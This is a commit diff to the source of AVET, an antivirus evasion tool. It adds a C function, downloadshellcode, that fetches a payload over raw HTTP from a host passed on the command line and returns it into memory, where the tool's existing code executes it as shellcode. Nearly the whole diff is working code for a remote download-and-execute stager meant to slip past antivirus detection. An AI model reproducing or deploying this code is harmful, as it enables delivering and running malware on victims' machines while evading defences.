add function downloadshellcode

charygao · Mar 16, 2018 · 2ff68d7 · 2ff68d7
1 parent edb8914
commit 2ff68d7
Showing 1 changed file with 72 additions and 2 deletions.
diff --git a/avet.c b/avet.c
@@ -26,16 +26,20 @@ Web: https://github.com/govolution/avet
 //     "    \\|__|\\|__|\\|__|/       \\|_______|   \\|__|\n"
 //         "\n\nAnti Virus Evasion Tool by Daniel Sauder\n"
 
+#include "defs.h"
 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <string.h>
-#include <windows.h>
 #include <tchar.h>
 #ifdef KVALUE
 	#include <winsock2.h>
 #endif
-#include "defs.h"
+#ifdef DOWNLOADEXECSC
+	#include "WinSock2.h"
+	#include "Ws2tcpip.h"
+#endif
+#include <windows.h>
 
 int get_filesize(char *fvalue);
 unsigned char* load_textfile(char *fvalue, unsigned char *buf, int size2);
@@ -48,6 +52,9 @@ char* ie_download(char* string, char* sh_filename);
 #ifdef ASCIIMSF
 void exec_shellcode_ASCIIMSF(unsigned char *shellcode);
 #endif
+#ifdef DOWNLOADEXECSC
+unsigned char* downloadshellcode(char* uri);
+#endif
 
 int main (int argc, char **argv)
 {
@@ -138,12 +145,14 @@ int main (int argc, char **argv)
 	#endif
 	#ifndef ENCRYPT
 	#ifndef ASCIIMSF 
+	#ifndef DOWNLOADEXECSC
 		#ifdef PRINT_DEBUG
 		printf("exec shellcode without decode_shellcode\n");
 		#endif
 		shellcode = buf;
 	#endif
 	#endif
+	#endif
 	#ifndef X64 
 	#ifndef ASCIIMSF
 		exec_shellcode(shellcode);
@@ -194,6 +203,67 @@ int main (int argc, char **argv)
 	return 0;
 }
 
+#ifdef DOWNLOADEXECSC
+//host=argv[1]
+unsigned char* downloadshellcode(char* uri)
+{
+	struct WSAData* wd = (struct WSAData*)malloc(sizeof(struct WSAData));
+	if (WSAStartup(MAKEWORD(2, 0), wd))
+		exit(1);
+	free(wd);
+	SOCKET sock;
+
+	char c;
+	int i, j;
+	char* file;
+	char* host = uri;
+	struct addrinfo* ai;
+	struct addrinfo hints;
+	char buf[512];
+
+	//if (argc == 3) file = argv[2]; else 
+	file = strrchr(uri, '/') + 1;
+	if (strstr(uri, "http://") == uri) host += 7;
+	memset(&hints, 0, sizeof(struct addrinfo));
+	hints.ai_family = AF_UNSPEC;
+	hints.ai_socktype = SOCK_STREAM;
+	hints.ai_protocol = IPPROTO_TCP;
+	sprintf(buf, "GET %s HTTP/1.1\r\n", uri);
+	*strchr(host, '/') = '\0';
+	if (i = getaddrinfo(host, "80", &hints, &ai)) exit(1); 
+	sprintf(buf + strlen(buf), "Host: %s\r\n\r\n", host);
+	sock = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
+	if (connect(sock, ai->ai_addr, ai->ai_addrlen))
+		exit(1);
+	freeaddrinfo(ai);
+	i = send(sock, buf, strlen(buf), 0);
+	if (i < strlen(buf) || i == -1) exit(1);
+	while (strcmp(buf, "\r\n")) {
+		for (i = 0; strcmp(buf + i - 2, "\r\n"); i++) { recv(sock, buf + i, 1, 0); buf[i + 1] = '\0'; }
+		if (strstr(buf, "HTTP/") == buf) {
+			if (strcmp(strchr(buf, ' ') + 1, "200 OK\r\n")) exit(1);
+		}
+		if (strstr(buf, "Content-Length:") == buf) {
+			*strchr(buf, '\r') = '\0';
+			j = atoi(strchr(buf, ' ') + 1);
+		}
+	}
+
+	unsigned char *sc=(char*)malloc(j * sizeof(char));
+	for (i = 0; i < j; i++) 
+	{ 
+		recv(sock, &c, 1, 0); 
+		sc[i]=c;
+		//printf("%c",c);
+	}
+
+	closesocket(sock);
+	WSACleanup();
+
+	return sc;	
+}
+#endif
+
 #if defined(LVALUE) || defined(UVALUE)
 int get_filesize(char *fvalue)
 {